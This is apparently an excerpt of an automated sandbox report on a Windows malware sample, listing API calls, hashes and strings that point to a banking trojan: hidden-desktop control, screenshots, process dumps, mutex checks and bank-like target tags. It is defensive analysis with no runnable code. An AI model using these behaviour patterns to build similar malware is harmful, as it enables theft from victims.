                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fc6b9f11d771c346bf426eaf6fddfc4bbc6eeef39ffcacea27d0ef19ae6b483
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F321F831AC47552BF32197A0AC0EF1A73D49F05B55F244604FA49763C0DFB4EC4586B9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D3F1CC
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D3F1E2
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D3F1F0
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3F1F9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D3F217
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3F225
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3EDD0,00000000,00000000,00000000), ref: 02D3F23A
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D3F24B
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D3F250
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D3F264
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3F272
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC1A1), ref: 02D3F27D
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5E8DC1A1,FAKTURA), ref: 02D3F297
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 5E8DC1A1$FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
                                                                                                                                                                                                                • API String ID: 2736094147-1599947135
                                                                                                                                                                                                                • Opcode ID: 65be2c10bebdb56d5aac3df591abd7fca99bc3fb1c5d4b15b97f4dc587a51096
                                                                                                                                                                                                                • Instruction ID: 9d77740c95d9d14b46e79dc3a447381725150d716e56f8bfc7a0c69d01c370ed
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65be2c10bebdb56d5aac3df591abd7fca99bc3fb1c5d4b15b97f4dc587a51096
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3921C136EC53197EE212A760EC0AF6A7384AF44B65F548604FE85A63C0DBB49C048AB5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D3A4,?), ref: 02D23BFD
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23C33
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23C67
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23CE7
                                                                                                                                                                                                                  • Part of subcall function 02D450A0: VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D450C8
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D23D45
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23D77
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,00000040,?,00000000,00000000), ref: 02D23DF8
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02D23DFF
                                                                                                                                                                                                                • MiniDumpWriteDump.DBGHELP(00000000), ref: 02D23E06
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D3A4), ref: 02D23E1A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BackslashPath$Current$DumpProcess$MiniQueryThreadVirtualWrite
                                                                                                                                                                                                                • String ID: DEBUG$csm$minidump.bin$scr.bmp$sysinfo.log
                                                                                                                                                                                                                • API String ID: 2628503961-3850779975
                                                                                                                                                                                                                • Opcode ID: 49ee37bebe9fc5517db672e53066bea948ecfe4d6c49d1decba6db7e72d91524
                                                                                                                                                                                                                • Instruction ID: 41722c44ef34d86033a9186603a7e9da229e27b51478d6ca31a79a784cb077c6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49ee37bebe9fc5517db672e53066bea948ecfe4d6c49d1decba6db7e72d91524
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A99138306046698FDB29DF38A4A87EAB7E2EF55308F5481D5E889D7300DB359D8DCB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C997
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C9D1
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3C9DB
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3C9E3
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C9F4
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3C9FB
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02D3CA31
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D3CA70
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D,?,?), ref: 02D3CAB7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: 5E8DC08D$\$ctunnel.zip$path_ctunnel.txt
                                                                                                                                                                                                                • API String ID: 2545201083-1071034778
                                                                                                                                                                                                                • Opcode ID: a19d3ead2bc50d098c8d5b8a7905e24aeab55f058f208bda95b323896c2e634a
                                                                                                                                                                                                                • Instruction ID: 8d36831a7f264bbfa422269380ba1f2b20d3be7cbbbb3219b5b2c6aa11b44652
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a19d3ead2bc50d098c8d5b8a7905e24aeab55f058f208bda95b323896c2e634a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B351F7319182598FCB16CB28E86CBE67BE5EF49300F1485D5D4CAE7301EB719D88CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D280BC
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,?,?,02D27F92,00000000,00000000), ref: 02D280C3
                                                                                                                                                                                                                • SetThreadDesktop.USER32(00000000,?,?,02D27F92,00000000,00000000), ref: 02D280CF
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: GetTickCount.KERNEL32 ref: 02D2D858
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D869
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02D6F5A0), ref: 02D2D893
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D8AC
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D6F54C), ref: 02D2D8D9
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D8EC
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: CreateMutexA.KERNEL32(00000000,00000000,02D6F670,?,?,02D27F92,00000000,00000000), ref: 02D2D90A
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D91B
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: CreateMutexA.KERNEL32(00000000,00000000,02D6F630,?,?,02D27F92,00000000,00000000), ref: 02D2D92F
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D948
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D95B
                                                                                                                                                                                                                  • Part of subcall function 02D2D850: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D96E
                                                                                                                                                                                                                  • Part of subcall function 02D2D9A0: memset.MSVCRT ref: 02D2D9B9
                                                                                                                                                                                                                  • Part of subcall function 02D2D9A0: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02D2D9D2
                                                                                                                                                                                                                  • Part of subcall function 02D49AA0: malloc.MSVCRT ref: 02D49AB2
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02D28167
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02D28175
                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,fuck), ref: 02D2817F
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: IsNetworkAlive.SENSAPI(02D26BEE,00000000), ref: 02D34B03
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: IsUserAnAdmin.SHELL32 ref: 02D34B11
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: DnsFlushResolverCache.DNSAPI ref: 02D34B1B
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B38
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02D34B57
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D34B70
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34B83
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B9C
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02D34BB5
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D34BC8
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34BD5
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02D28222
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02D28231
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02D28260
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2826F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2827D
                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000), ref: 02D28286
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,00000000), ref: 02D282CC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Create$EventFileMutexObjectSingleWait$HeapThreadmemset$AllocCheckConnectionDesktopInternetMappingViewlstrcpyn$AdminAliveCacheCountCurrentFlushNetworkReleaseResolverSleepTickUserVersionlstrcpymalloc
                                                                                                                                                                                                                • String ID: SYSTEM!528110!3DEABDE9$fuck
                                                                                                                                                                                                                • API String ID: 2939156510-2479639858
                                                                                                                                                                                                                • Opcode ID: 5113d8f458fdba42faa657b1c4a7b6b61cd12f607ed521e8a2cb806f81e99f6e
                                                                                                                                                                                                                • Instruction ID: 492982fc1f797cc4d00738f8713beb6b568350d47354e00dc4ac0565e6b4a693
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5113d8f458fdba42faa657b1c4a7b6b61cd12f607ed521e8a2cb806f81e99f6e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C051FF759403209FD7109F64E94CFA63BE9EF58318F158AA9E9448B391C775AC18CF70
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc077), ref: 02D3E0B0
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc077), ref: 02D3E0ED
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E102
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3E10C
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3E114
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E125
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3E12C
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D3E139
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc077,?,?), ref: 02D3E161
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,5e8dc077,02D6A2A8), ref: 02D3E17F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D3E182
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D3E18F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D3E192
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapPath$Backslash$DirectoryErrorLastProcess$AdminCreateCurrentFolderFreeMakeSystemUserValidate
                                                                                                                                                                                                                • String ID: 5e8dc077$cc.txt
                                                                                                                                                                                                                • API String ID: 2491352018-4205126158
                                                                                                                                                                                                                • Opcode ID: cf2539da69b198d66e04edb60397aa207b92219e109a3403f1f3b29d84852baf
                                                                                                                                                                                                                • Instruction ID: a69aa4cf80f739da668847bc76405ab4bbc7d8845dc8708dacb5bc1a2df59182
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf2539da69b198d66e04edb60397aa207b92219e109a3403f1f3b29d84852baf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31FF31A40315ABE721AB74AC5CBAB7BA8EF49B01F544950F986D7340EA74DC84CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D4211C
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D4212D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D42141
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4214F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D41FA0,00000000,00000000,00000000), ref: 02D42164
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D42175
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D4217A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D4218E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4219C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc4c1), ref: 02D421A7
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5e8dc4c1,RAIFF), ref: 02D421C1
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D421CA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 5e8dc4c1$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$RAIFF
                                                                                                                                                                                                                • API String ID: 505831200-115387483
                                                                                                                                                                                                                • Opcode ID: a3280fa361de3f6f68b68c07cb1b94354b859147c1dee03579bd76664a29768b
                                                                                                                                                                                                                • Instruction ID: ee62babe3faf3df0befca2e136b0b9d427503bd1d15d19e3274e8c9f0b2492bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3280fa361de3f6f68b68c07cb1b94354b859147c1dee03579bd76664a29768b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D311B131A88711BBF21157A0AC0EF1A3B985F48B55F544504FE46A13C0DFF4AD548AB6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02D2A00E
                                                                                                                                                                                                                  • Part of subcall function 02D2DFB0: GetWindowLongA.USER32(75C0BCB0,000000F0), ref: 02D2DFCB
                                                                                                                                                                                                                  • Part of subcall function 02D2DFB0: GetLastActivePopup.USER32(75C0BCB0), ref: 02D2DFD9
                                                                                                                                                                                                                  • Part of subcall function 02D2DFB0: GetWindow.USER32(00000000,00000005), ref: 02D2DFF3
                                                                                                                                                                                                                  • Part of subcall function 02D2DFB0: GetWindow.USER32(00000000), ref: 02D2DFF6
                                                                                                                                                                                                                  • Part of subcall function 02D2DFB0: GetWindowInfo.USER32(00000000,?), ref: 02D2E00C
                                                                                                                                                                                                                  • Part of subcall function 02D2DFB0: GetWindow.USER32(00000000,00000004), ref: 02D2E015
                                                                                                                                                                                                                  • Part of subcall function 02D2DFB0: GetWindow.USER32(00000000,00000003), ref: 02D2E04E
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02D2A04F
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002,00000000), ref: 02D2A0D5
                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02D2A0FC
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02D2A141
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02D2A195
                                                                                                                                                                                                                  • Part of subcall function 02D29EB0: GetTickCount.KERNEL32 ref: 02D29F3A
                                                                                                                                                                                                                  • Part of subcall function 02D29EB0: GetClassLongA.USER32(00000000,000000E6), ref: 02D29F8D
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000112,?,?), ref: 02D2A1FE
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02D2A229
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02D2A2A5
                                                                                                                                                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 02D2A2C4
                                                                                                                                                                                                                • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02D2A2E8
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2A353
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02D2A366
                                                                                                                                                                                                                • PostMessageA.USER32(?,?,00000001,00000000), ref: 02D2A389
                                                                                                                                                                                                                • PostMessageA.USER32(?,?,00000002,00000000), ref: 02D2A3AB
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02D2A3E3
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2A40D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 590198697-0
                                                                                                                                                                                                                • Opcode ID: f1944ad3460459ff5173cb731a2ceeceea119a074248d91a37e079d26b2c3ae1
                                                                                                                                                                                                                • Instruction ID: 3c84a6236994cef63acd24a481fac1f06c847b843427cfbdaf2fc87e0a34c30d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1944ad3460459ff5173cb731a2ceeceea119a074248d91a37e079d26b2c3ae1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBB17832F402345AEB309A58E889FBE7368DB6572DF20802AFD45D7381C7699C59C7B1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?), ref: 02D29062
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: SelectObject.GDI32(00000000,00000000), ref: 02D28C4A
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: DeleteObject.GDI32(00000000), ref: 02D28C59
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: DeleteDC.GDI32(00000000), ref: 02D28C67
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: SelectObject.GDI32(?,00000000), ref: 02D28C77
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: DeleteObject.GDI32(00000000), ref: 02D28C7F
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: DeleteDC.GDI32(?), ref: 02D28C88
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: GetDC.USER32(00000000), ref: 02D28C8C
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: CreateCompatibleDC.GDI32(00000000), ref: 02D28C9B
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: CreateCompatibleDC.GDI32(00000000), ref: 02D28CA3
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D28CC4
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: SelectObject.GDI32(?,00000000), ref: 02D28CD3
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D28CEE
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: SelectObject.GDI32(00000000,00000000), ref: 02D28D0D
                                                                                                                                                                                                                  • Part of subcall function 02D28C30: ReleaseDC.USER32(00000000,00000000), ref: 02D28D1C
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02D2907F
                                                                                                                                                                                                                • GetTopWindow.USER32(00000000), ref: 02D29092
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D290A9
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02D290C9
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D290CC
                                                                                                                                                                                                                • WindowFromPoint.USER32(?,?,00000000), ref: 02D290E0
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,?,00000005,00000000), ref: 02D29103
                                                                                                                                                                                                                • GetIconInfo.USER32(?,?), ref: 02D2910B
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 02D29116
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 02D29121
                                                                                                                                                                                                                • DrawIcon.USER32(00000000,00000000,?,?), ref: 02D29143
                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,00000000), ref: 02D2914A
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,?,00000005,?), ref: 02D2915B
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 02D29163
                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 02D29170
                                                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 02D2917D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object$Delete$CompatibleCreateSelectWindow$Icon$BitmapMessageReleaseSendSingleWait$DesktopDestroyDrawEventFromInfoMutexPointSleepThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1852974301-0
                                                                                                                                                                                                                • Opcode ID: 4625a5e8462656179c326cab796b6a11aa1cf8583c41d127af049c25c0151727
                                                                                                                                                                                                                • Instruction ID: a206ff6b65fcd50d251020d58cc6f61977bec45d6269e6c08f4fe71d821679d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4625a5e8462656179c326cab796b6a11aa1cf8583c41d127af049c25c0151727
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27314A79980211AFC310DB64F98CE6B37B9EB98B15B548A08F90687380DB74EC65CB71
                                                                                                                                                                                                                APIs
